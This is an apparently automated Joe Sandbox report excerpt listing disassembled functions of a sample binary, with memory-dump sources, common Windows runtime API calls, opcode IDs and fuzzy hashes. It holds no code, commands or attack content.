                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FormatInfoLocaleNumber
                                        • String ID:
                                        • API String ID: 2169056816-0
                                        • Opcode ID: 563b4276fc4768a292be918edc39e9ff38d307ef045d5b19ab71d8dffb38a403
                                        • Instruction ID: 6a4a624754a6f0c720cdf0020b8336e9df47b3caa1594d52ad36e8adc7f2ea28
                                        • Opcode Fuzzy Hash: 563b4276fc4768a292be918edc39e9ff38d307ef045d5b19ab71d8dffb38a403
                                        • Instruction Fuzzy Hash: 1F118E75221358ABEB00DF60EC49FEAB7F8EF08700F104429F605A7191DA70A998DB64
                                        Function 002748AA Relevance: 2.0, Strings: 1, Instructions: 776COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CMT
                                        • API String ID: 0-2756464174
                                        • Opcode ID: b4fda0099bec0c85d72c224352783c1fb68b983043ae2ca68d34ff9f2e82496d
                                        • Instruction ID: 4511e8dcbe62c8eb729d927be485a80386edaa2c9c1db68a9f0ed990d94cc517
                                        • Opcode Fuzzy Hash: b4fda0099bec0c85d72c224352783c1fb68b983043ae2ca68d34ff9f2e82496d
                                        • Instruction Fuzzy Hash: 0662C871A216559FDF09EF74C881BDD7BA4BF15300F088179EC099B282DB74A968CFA1
                                        Function 002A86D2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002A86CD,?,?,00000008,?,?,002A836D,00000000), ref: 002A88FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: 66412ae72ff13ffeea2a63aabf2a8d6767fb81e93bf3807b4460758f5b1c1575
                                        • Instruction ID: 09ef444586b038aac7bda1598c7dd0eb2d654466b35c61ea85d66d612227aeb6
                                        • Opcode Fuzzy Hash: 66412ae72ff13ffeea2a63aabf2a8d6767fb81e93bf3807b4460758f5b1c1575
                                        • Instruction Fuzzy Hash: 5AB19E3552060ACFD714CF28C48AB65BBE0FF06364F258658E899CF2A1CB35D9A2CB40
                                        Function 00296694 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 002966AA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor
                                        • String ID:
                                        • API String ID: 2325560087-0
                                        • Opcode ID: 9e4e4b31cfa94bd647a7c3aa8100d02e1a1ee4cc90cca1e6e44c3db2a8daf73b
                                        • Instruction ID: fdbb76a69a0c4da7fee49a2d53fc320aebce2657b1b59fab62b3ac6977c7b40f
                                        • Opcode Fuzzy Hash: 9e4e4b31cfa94bd647a7c3aa8100d02e1a1ee4cc90cca1e6e44c3db2a8daf73b
                                        • Instruction Fuzzy Hash: DC518BB1A212068FEF14CF99E88DBAEBBF0FB48314F24856AC405EB351D7759950CB90
                                        Function 002803BE Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 002803ED
                                          • Part of subcall function 00280469: __EH_prolog3.LIBCMT ref: 00280470
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3Version
                                        • String ID:
                                        • API String ID: 2775145068-0
                                        • Opcode ID: f182c22ba32446156992f6ded6e1a3cb2b72e51e0041ae433ab7a5a15ef4ef4b
                                        • Instruction ID: 4aeca34859de60620963b53c3ae396bb1881e343c6e2484c469352ee7afd2db5
                                        • Opcode Fuzzy Hash: f182c22ba32446156992f6ded6e1a3cb2b72e51e0041ae433ab7a5a15ef4ef4b
                                        • Instruction Fuzzy Hash: F7F0A47486524C8EEFA4FF70BC897D97BA49B15308F004568D60737292DBB4459D9F11
                                        Function 00275AFE Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: gj
                                        • API String ID: 0-4203073231
                                        • Opcode ID: 0fb7b97554207edb3b6600b5a24f1c353cf8755994eb9075bd278463e727e591
                                        • Instruction ID: 3717220b70c4f0a87a7d85517a1fe5e743dc3cefc709fda7e88a4de2a4a48599
                                        • Opcode Fuzzy Hash: 0fb7b97554207edb3b6600b5a24f1c353cf8755994eb9075bd278463e727e591
                                        • Instruction Fuzzy Hash: 08D127B2A083558FC354CF29D88065AFBE2BFC9308F59492EE998D7301D734A955CF86
                                        Function 00296A0B Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00026A20,00296445), ref: 00296A10
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: d7b65915898ddcdf781c7e3c8fa1aee7f259e405d5fdb65a14892080094cfaa9
                                        • Instruction ID: 2cf27c4c2bc999e79a6fa9b2d9526e2d35ad843d327f1911f0a815f0251e6890
                                        • Opcode Fuzzy Hash: d7b65915898ddcdf781c7e3c8fa1aee7f259e405d5fdb65a14892080094cfaa9
                                        • Instruction Fuzzy Hash:
                                        Function 002A2CE0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: 627d09f8d790da750f6f56c87a74e9d6878f34991899b6a7b8875c7e88c8c549
                                        • Instruction ID: be3c05e49c73ae0da1baff5d3ea0f417e0d4b47793892104fe19d2922c234eb4
                                        • Opcode Fuzzy Hash: 627d09f8d790da750f6f56c87a74e9d6878f34991899b6a7b8875c7e88c8c549
                                        • Instruction Fuzzy Hash: 0DA02230302200CFAB008F30BF0C30E3AE8FE022C0308802CA00ACA032EF328020CB00
                                        Function 0028ABC8 Relevance: 1.0, Instructions: 977COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                        • Instruction ID: 14c6eebb26c172f7d96e2a0a1eed77efbc1a655ab83f6c8ca7d59691c26d32f3
                                        • Opcode Fuzzy Hash: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                        • Instruction Fuzzy Hash: 91825C396257458FCB26EF38C4906BABBE1BF51304F18845ED8DB8B386D730A965CB11
                                        Function 00275F39 Relevance: .9, Instructions: 899COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b32a93d92f1a8859f61816663a4a5bae4a853f7e7a9264550b35b723bcf3dd97
                                        • Instruction ID: ee4e44dcbd6b88dfb85deff15115e9696c7386ec061d8fd49dd138da90bf9fb9
                                        • Opcode Fuzzy Hash: b32a93d92f1a8859f61816663a4a5bae4a853f7e7a9264550b35b723bcf3dd97
                                        • Instruction Fuzzy Hash: 70823D65D39F995EE303A63484021E7F3A86EF72C9F46D71FF8A431426E721A6C75201
                                        Function 0028C27F Relevance: .9, Instructions: 880COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                        • Instruction ID: fc91b495d51ad6bb3162ad863f8b12473e217f11c79f410c5e49ca40d4e7b85c
                                        • Opcode Fuzzy Hash: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                        • Instruction Fuzzy Hash: CA724D396253858FCB15EF68C4806B9BBE1FF85304F28C56DD89A8B386D330E955CB21
                                        Function 00285214 Relevance: .7, Instructions: 694COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                        • Instruction ID: 5843ba1e25ed36b2c9e9ca9d8110051c5a5bb2c7865796c6618031a6d38443f1
                                        • Opcode Fuzzy Hash: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                        • Instruction Fuzzy Hash: 37524B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                        Function 0028BC05 Relevance: .5, Instructions: 537COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d4f9e52c56fef58a07884190a0fa14f354ce95af89d88caa20c32ec41693f17
                                        • Instruction ID: 3db5226da65098e1252c2ebf386454143d482af41c04803b79afa3d840478cea
                                        • Opcode Fuzzy Hash: 0d4f9e52c56fef58a07884190a0fa14f354ce95af89d88caa20c32ec41693f17
                                        • Instruction Fuzzy Hash: A11204742257068FD729DF28C8947B9B7E0FF44304F24892EE89AC76C1D774A9A5CB01
                                        Function 002846CF Relevance: .3, Instructions: 330COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a0146a88cfea76f6d152ea3192634804c18bdc1bee72a15ee8cb8bbd8a03716
                                        • Instruction ID: 1edea6ad4194d6753f730d4fb3cc85cd9703a09790bdc4aae425742a52f16f85
                                        • Opcode Fuzzy Hash: 9a0146a88cfea76f6d152ea3192634804c18bdc1bee72a15ee8cb8bbd8a03716
                                        • Instruction Fuzzy Hash: 84E15BB45083918FC304CF29E48486ABBF0FB9E300F4A495EF5D497352C235EA1ADB52
                                        Function 0028A222 Relevance: .3, Instructions: 279COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7967047c3ab5fa62600ca604883134ab36db279049a5c3a5c6fbbae0bb46a48b
                                        • Instruction ID: d13905c448b7afae19db0bb27b07c244cc5f0a526b358c8c7aca59ffaebc3eff
                                        • Opcode Fuzzy Hash: 7967047c3ab5fa62600ca604883134ab36db279049a5c3a5c6fbbae0bb46a48b
                                        • Instruction Fuzzy Hash: D4917B353293424FEB25EE28C8847AE77D5AF90304F14493EE98A872C2DF7498958753
                                        Function 0029C0D6 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06eec507d1d98aeea3b83bb2f7bfc6407af5e029babf7f4ed9bbeb165b00da68
                                        • Instruction ID: dc5ae520229a747fbe96f1b804395c4fecba6e581c9e0ac6755dc1c5b8c0937e
                                        • Opcode Fuzzy Hash: 06eec507d1d98aeea3b83bb2f7bfc6407af5e029babf7f4ed9bbeb165b00da68
                                        • Instruction Fuzzy Hash: 00619C31A3070A63EE388FA898A27BE3394DF05304F70041AEC4BDF292D6519D72875D
                                        Function 0029BEA7 Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                        • Instruction ID: d8366be25450b8a89f1dc2ca9bc77b1b3c1fa3d53feba1c630a7624ff4c153c5
                                        • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                        • Instruction Fuzzy Hash: DF51B82123074B97DF368E2DAB5A7FE23999B02300F68052AF986C7E82C741DD35CB55
                                        Function 00284D32 Relevance: .2, Instructions: 171COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 64b4d477007a761aa2b7dceaa75b867ef141c6ec7fe2d862e8aeba078cd2b2cc
                                        • Instruction ID: 9c937b1b6dec5f3b108b029a254967de96055aa1d554ac90fde9b2cb5be435a6
                                        • Opcode Fuzzy Hash: 64b4d477007a761aa2b7dceaa75b867ef141c6ec7fe2d862e8aeba078cd2b2cc
                                        • Instruction Fuzzy Hash: 1F5125355193D74FC712FF28C0409AEBFF0AE9A308F0A4999E5D55B282D230E65ACB52
                                        Function 00285F0B Relevance: .1, Instructions: 148COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b3a9c436ca051746ca4a5bb3c4011d941efda0f9df2e1071bf77b1ae150c101
                                        • Instruction ID: 57e4ea16f3b2e3cfaaf37b16f6d115b377141c34f40362be15d3a52c92666536
                                        • Opcode Fuzzy Hash: 1b3a9c436ca051746ca4a5bb3c4011d941efda0f9df2e1071bf77b1ae150c101
                                        • Instruction Fuzzy Hash: 4F51DEB1A087119FC758CF29D48055AF7E1BF88314F058A2EF899E7740DB30E959CB96
                                        Function 0028A008 Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                        • Instruction ID: 5b4d4439b0f47c56d44c9c9f1734720981cff19d77a2e28deefdc95ff400fcfb
                                        • Opcode Fuzzy Hash: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                        • Instruction Fuzzy Hash: C73116B56287068FDB14EF28C85126ABBD0FB95310F14492EE4D9C3782D775E829CF92
